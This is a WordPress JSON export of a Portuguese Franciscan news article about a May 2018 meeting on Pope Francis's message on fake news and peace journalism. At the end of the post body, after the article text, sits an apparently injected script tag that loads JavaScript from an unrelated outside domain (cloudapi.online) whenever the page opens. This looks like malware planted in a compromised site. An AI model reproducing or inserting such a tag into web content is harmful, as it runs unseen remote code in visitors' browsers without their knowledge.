{"id":158639,"date":"2018-05-05T11:00:52","date_gmt":"2018-05-05T14:00:52","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=158639"},"modified":"2019-08-13T10:57:39","modified_gmt":"2019-08-13T13:57:39","slug":"fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html","title":{"rendered":"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignnone wp-image-192264 size-full\" src=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao.jpg\" alt=\"\" width=\"890\" height=\"400\" srcset=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao.jpg 890w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao-450x202.jpg 450w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao-768x345.jpg 768w, https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao-150x67.jpg 150w\" sizes=\"(max-width: 890px) 100vw, 890px\" \/><\/p>\n<p><strong>Frei Augusto Luiz Gabriel<\/strong><\/p>\n<p>Realizou-se nesta quarta-feira, dia 02 de maio, na sede da Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o, em S\u00e3o Paulo (SP), o III Encontro de Forma\u00e7\u00e3o Permanente da Frente de Evangeliza\u00e7\u00e3o da Comunica\u00e7\u00e3o. Frei Gustavo Medella, Definidor Provincial e coordenador da Frente, apresentou como tema de reflex\u00e3o, atrav\u00e9s de uma videoconfer\u00eancia, a Mensagem do Papa Francisco para o 52\u00ba dia das Comunica\u00e7\u00f5es Sociais <a href=\"http:\/\/franciscanos.org.br\/?p=153323\"><strong>(VEJA A MENSAGEM NA \u00cdNTEGRA)<\/strong><\/a>, a ser celebrado no pr\u00f3ximo dia 13 de maio de 2018, Solenidade da Ascens\u00e3o do Senhor.<\/p>\n<p>Marcaram presen\u00e7a frades, colaboradores e leigos que trabalham diretamente com a comunica\u00e7\u00e3o, a saber: Funda\u00e7\u00e3o Frei Rog\u00e9rio, de Curitibanos (SC), Rede Celinauta de Comunica\u00e7\u00e3o, de Pato Branco (PR), Grupo Educacional Bom Jesus, de Curitiba (PR), Servi\u00e7o Franciscano de Solidariedade \u2013 Sefras (SP), Universidade S\u00e3o Francisco \u2013 USF (SP), Sede Provincial (SP), Frei Roger Strapazzon da Fraternidade Franciscana do Sagrado Cora\u00e7\u00e3o de Jesus, de Petr\u00f3polis (RJ), e Merc\u00eas Brand\u00e3o, da Par\u00f3quia Porci\u00fancula de Sant\u2019Ana, de Niter\u00f3i (RJ).<\/p>\n<p>O tema da mensagem foi retirado do Evangelho de S\u00e3o Jo\u00e3o: \u201cA verdade vos tornar\u00e1 livres\u201d (Jo\u00a08, 32), e \u00e9 complementado pelo subt\u00edtulo: \u201cFake news\u00a0e jornalismo de paz\u201d. Lan\u00e7ada pela primeira vez no pontificado do Papa Paulo VI, a Mensagem para o Dia das Comunica\u00e7\u00f5es Sociais j\u00e1 \u00e9 uma tradi\u00e7\u00e3o na Igreja. Ela \u00e9 sempre apresentada no in\u00edcio do ano e celebrada no Dia Mundial das Comunica\u00e7\u00f5es Sociais, no Domingo da Ascens\u00e3o do Senhor.<\/p>\n<p><strong><img loading=\"lazy\" class=\"alignleft wp-image-158649 \" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_020518_1.jpg\" alt=\"encontro_comunicacao_020518_1\" width=\"356\" height=\"445\" \/>O QUE H\u00c1 DE FALSO NAS \u00abNOT\u00cdCIAS FALSAS\u00bb?<\/strong><\/p>\n<p>O Papa Francisco inicia sua reflex\u00e3o perguntando o que ent\u00e3o h\u00e1 de falso nas not\u00edcias falsas. Segundo o Santo Padre, a express\u00e3o\u00a0<em>fake news<\/em>\u00a0\u00e9 objeto de discuss\u00e3o e debate. \u201cGeralmente diz respeito \u00e0 desinforma\u00e7\u00e3o transmitida\u00a0<em>on-line<\/em>\u00a0ou nos\u00a0<em>mass-media<\/em>\u00a0tradicionais. Assim, a referida express\u00e3o alude a informa\u00e7\u00f5es infundadas, baseadas em dados inexistentes ou distorcidos, tendentes a enganar e at\u00e9 manipular o destinat\u00e1rio. A sua divulga\u00e7\u00e3o pode visar objetivos prefixados, influenciar op\u00e7\u00f5es pol\u00edticas e favorecer lucros econ\u00f4micos\u201d.<\/p>\n<p>Discorrendo sobre a efic\u00e1cia das fake news, Frei Gustavo prop\u00f4s a seguinte reflex\u00e3o: \u201cPor que as not\u00edcias falsas possuem tanta efic\u00e1cia e atingem os objetivos a que se prop\u00f5em?\u201d E sugere algumas respostas: \u201cPrimeiro porque elas se apresentam como algo que imita a verdade (natureza <em>\u2018mim\u00e9tica\u2019<\/em>). A segunda raz\u00e3o \u00e9 porque se apoiam em estere\u00f3tipos e preconceitos que normalmente s\u00e3o generalizados. E o terceiro motivo: exploram emo\u00e7\u00f5es imediatas e \u00e0s vezes f\u00e1ceis de serem despertadas, como, por exemplo: a ansiedade, o desprezo, a ira e a frustra\u00e7\u00e3o\u201d, explicou.<\/p>\n<p><strong>COMO PODEMOS RECONHEC\u00ca-LAS?<\/strong><\/p>\n<p>Segundo o Papa, nenhum de n\u00f3s pode se eximir da responsabilidade de contrastar estas falsidades. N\u00e3o \u00e9 tarefa f\u00e1cil, porque a desinforma\u00e7\u00e3o se baseia muitas vezes sobre discursos variegados, deliberadamente evasivos e subtilmente enganadores, valendo-se por vezes de mecanismos refinados. \u201cDentro da medida do poss\u00edvel, temos o dever de contrapor, de apresentar e desmascarar estas falsidades\u201d, afirma Frei Gustavo.<\/p>\n<p>O Papa chama a serpente l\u00e1 do Antigo Testamento, aquela que \u201cpassou a conversa\u201d em Eva, de \u2018art\u00edfice da primeira fake news\u2019. \u201cSe o diabo de fato \u00e9 o pai da mentira, a serpente tentadora \u00e9 aquela que veio trazer a confus\u00e3o. Se n\u00e3o tomarmos conta, esta base de maldade que habita em nossa sociedade, pode agir tamb\u00e9m dentro de n\u00f3s\u201d, destacou o palestrante.<\/p>\n<p>Para Frei Gustavo, as <em>fake news<\/em> rapidamente viralizam porque correm com muita pressa, apoiadas na l\u00f3gica do \u201cquerer mais\u201d e do \u201csaber mais\u201d. \u201cMuitas vezes estamos \u00e1vidos por causar algum impacto por conta daquela not\u00edcia falsa e acabamos replicando a mesma\u201d, ressaltou.<\/p>\n<p><strong>\u00abA VERDADE VOS TORNAR\u00c1 LIVRES\u00bb <\/strong><\/p>\n<p>Ainda na mensagem, o Papa Francisco faz refer\u00eancia ao fil\u00f3sofo e jornalista do Imp\u00e9rio Russo, Fi\u00f3dor Dostoevskij, que deixou escrito algo not\u00e1vel neste sentido: \u201cQuem mente a si mesmo e escuta as pr\u00f3prias mentiras, chega a pontos de j\u00e1 n\u00e3o poder distinguir a verdade dentro de si mesmo nem ao seu redor, e assim come\u00e7a a deixar de ter estima de si mesmo e dos outros. Depois, dado que j\u00e1 n\u00e3o tem estima de ningu\u00e9m, cessa tamb\u00e9m de amar, e ent\u00e3o na falta de amor, para se sentir ocupado e distrair, abandona-se \u00e0s paix\u00f5es e aos prazeres triviais e, por culpa dos seus v\u00edcios, torna-se como uma besta; e tudo isso deriva do mentir cont\u00ednuo aos outros e a si mesmo\u201d.<\/p>\n<p>\u201cA verdade vai al\u00e9m de um ju\u00edzo sobre as coisas, ou de trazer \u00e0 luz coisas obscuras. A verdade tem a ver com a integridade da pessoa. Como percurso e elementos fundamentais para a busca da verdade, o Papa tamb\u00e9m oferece ideia da liberta\u00e7\u00e3o da falsidade e da busca do relacionamento\u201d, sublinhou Frei Gustavo.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_020518_2.jpg\" alt=\"encontro_comunicacao_020518_2\" width=\"830\" height=\"437\" \/><\/p>\n<p><strong>A PAZ \u00c9 A VERDADEIRA NOT\u00cdCIA <\/strong><\/p>\n<p>Encerrando sua mensagem, em uma fala mais direta aos jornalistas e aos profissionais da comunica\u00e7\u00e3o, o sucessor de Pedro diz que o melhor ant\u00eddoto contra a falsidade, passa fundamentalmente pelas pessoas. \u201cQuando a pessoa deixa emergir a verdade atrav\u00e9s de um di\u00e1logo sincero, com espontaneidade e liberdade, a verdade vem \u00e0 tona. N\u00f3s que trabalhamos com a comunica\u00e7\u00e3o temos uma grande miss\u00e3o, somos guardi\u00e3es da verdade, como fala o Papa Francisco\u201d, observou Frei Medella.<\/p>\n<p>Edson Honaiser, coordenador de jornalismo da R\u00e1dio Celinauta, afirma que convive com not\u00edcias falsas no dia a dia de trabalho. \u201cNa atualidade a gente v\u00ea por a\u00ed uma enxurrada de publica\u00e7\u00f5es sem fundamentos. Existe uma interroga\u00e7\u00e3o no ar sobre o que \u00e9 ou n\u00e3o \u00e9 confi\u00e1vel, sobre o que \u00e9 verdadeiro ou n\u00e3o, por isso em nossa emissora temos a inten\u00e7\u00e3o de verificar e trazer a reflex\u00e3o em torno daquilo que est\u00e1 sendo propagado por a\u00ed\u201d, sublinhou.<\/p>\n<p>Bruna May, locutora e rep\u00f3rter na r\u00e1dio Coroado,\u00a0 afirmou: \u201cMais do que nunca precisamos tomar cuidado antes de levarmos para o ar novas publica\u00e7\u00f5es e atualiza\u00e7\u00f5es. Hoje, muitas pessoas j\u00e1 conseguem identificar e separar o que \u00e9 bom e o que \u00e9 ruim, e o que \u00e9 fake. Muitas vezes, a not\u00edcia real \u00e9 mal interpretada, imagina quando a not\u00edcia \u00e9 falsa. Precisamos checar as informa\u00e7\u00f5es e levar o que \u00e9 correto at\u00e9 os nossos ve\u00edculos de comunica\u00e7\u00e3o\u201d.<\/p>\n<p>Encerrando o terceiro Encontro de Forma\u00e7\u00e3o Permanente, Frei Gustavo prop\u00f4s aos participantes que rezassem a ora\u00e7\u00e3o que encerra a mensagem do Papa Francisco. O pr\u00f3ximo encontro acontecer\u00e1 no dia 06 de junho e contar\u00e1 com a assessoria de Frei Claudino Gilz, professor de Ensino Religioso do Grupo Educacional Bom Jesus, de Curitiba (PR).<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Frente da Comunica\u00e7\u00e3o<\/p>\n","protected":false},"author":5,"featured_media":192265,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[545,497,550,84],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Frente da Comunica\u00e7\u00e3o\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-05T14:00:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-08-13T13:57:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"330\" \/>\n\t<meta property=\"og:image:height\" content=\"219\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"freiaugusto\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"freiaugusto\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_1.jpg\",\"width\":330,\"height\":219},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html\",\"name\":\"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#primaryimage\"},\"datePublished\":\"2018-05-05T14:00:52+00:00\",\"dateModified\":\"2019-08-13T13:57:39+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\",\"name\":\"freiaugusto\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"caption\":\"freiaugusto\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html","og_locale":"pt_BR","og_type":"article","og_title":"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro - Not\u00edcias - Franciscanos","og_description":"Frente da Comunica\u00e7\u00e3o","og_url":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-05-05T14:00:52+00:00","article_modified_time":"2019-08-13T13:57:39+00:00","og_image":[{"width":330,"height":219,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_1.jpg","type":"image\/jpeg"}],"author":"freiaugusto","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"freiaugusto","Est. tempo de leitura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/encontro_comunicacao_1.jpg","width":330,"height":219},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html","name":"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#primaryimage"},"datePublished":"2018-05-05T14:00:52+00:00","dateModified":"2019-08-13T13:57:39+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/fake-news-e-jornalismo-de-paz-e-o-tema-do-segundo-encontro-da-comunicacao.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Fake news\u00a0e jornalismo de paz \u00e9 tema do 3\u00ba encontro"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91","name":"freiaugusto","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","caption":"freiaugusto"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/158639"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=158639"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/158639\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/192265"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=158639"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=158639"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=158639"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}